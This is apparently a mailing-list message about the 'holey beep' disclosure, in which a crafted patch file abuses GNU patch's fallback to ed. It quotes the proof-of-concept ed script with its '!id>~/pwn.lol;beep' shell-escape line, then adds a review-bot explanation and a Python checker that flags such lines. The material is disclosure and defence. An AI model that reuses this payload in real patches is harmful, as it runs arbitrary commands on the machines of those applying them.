The https://holeybeep.ninja/ website contains a patch 
https://holeybeep.ninja/beep.patch.

The patch contains a line starting with a !.

That’s the actual bug, and it’s in the patch program.

http://git.savannah.gnu.org/cgit/patch.git/tree/src/pch.c#n2383

--- /dev/null   2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c    2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!id>~/pwn.lol;beep # 13-21 12:53:21.000000000 +0100
.
  -- https://holeybeep.ninja/beep.patch
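
Review bot: the line starting with "!" after "1,112d" is not content for beep.c. This part of the file is an ed script ("1337a", "1,112d", ".") rather than a unified hunk, and ed treats a leading "!" as a shell escape, so the rest of that line ("id>~/pwn.lol;beep") is a command that would run when the patch is applied. Reject the patch as it stands and ask for a regular unified diff with "@@" hunks. The header dates (2018-13-37) are not valid dates either, which is a further sign the file was built by hand rather than generated by diff.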

patch calls ed. Ed calls sh. Arbitrary command execution through unreviewed 
patches.

Does git call patch or implement patch-parsing by itself?

K

-- 
Kristian Köhntopp http://google.com/+KristianKohntopp
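
An added example, not part of the original message and not code from the patch project: a pre-apply check that reports "!" lines inside ed-style sections of a patch file, run here on the excerpt quoted above. The function name, the set of reset prefixes and the benign sample are assumptions made for this illustration.

```python
import re

# ed-script commands as emitted by "diff -e": line[,line] plus a command letter.
ED_CMD = re.compile(r"^\d+(?:,\d+)?[acdi]$")
# Prefixes that start a new file header or a unified hunk and end an ed section.
RESET = ("--- ", "+++ ", "@@", "diff ", "Index: ")


def find_ed_shell_escapes(patch_text):
    """Return [(line_no, line)] for '!' lines inside ed-style sections.

    Deliberately conservative: ed's text-input mode is not modelled, so a
    '!' line is reported even where it looks like appended text.
    """
    findings = []
    in_ed_section = False
    for no, line in enumerate(patch_text.splitlines(), 1):
        if line.startswith(RESET):
            in_ed_section = False
        elif ED_CMD.match(line):
            in_ed_section = True
        elif in_ed_section and line.startswith("!"):
            findings.append((no, line))
    return findings


# The excerpt quoted in the message above.
PAGE_EXCERPT = """\
--- /dev/null   2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c    2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!id>~/pwn.lol;beep # 13-21 12:53:21.000000000 +0100
.
"""

# Constructed sample: an ordinary unified diff whose content contains '!'.
BENIGN_UNIFIED = """\
--- a/beep.c
+++ b/beep.c
@@ -1,2 +1,2 @@
-!old
+!new
 context
"""

if __name__ == "__main__":
    for name, text in (("excerpt", PAGE_EXCERPT), ("benign", BENIGN_UNIFIED)):
        hits = find_ed_shell_escapes(text)
        print(name, "REJECT" if hits else "ok", hits)
```

A non-empty result means the file should go to a human reviewer instead of being applied.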
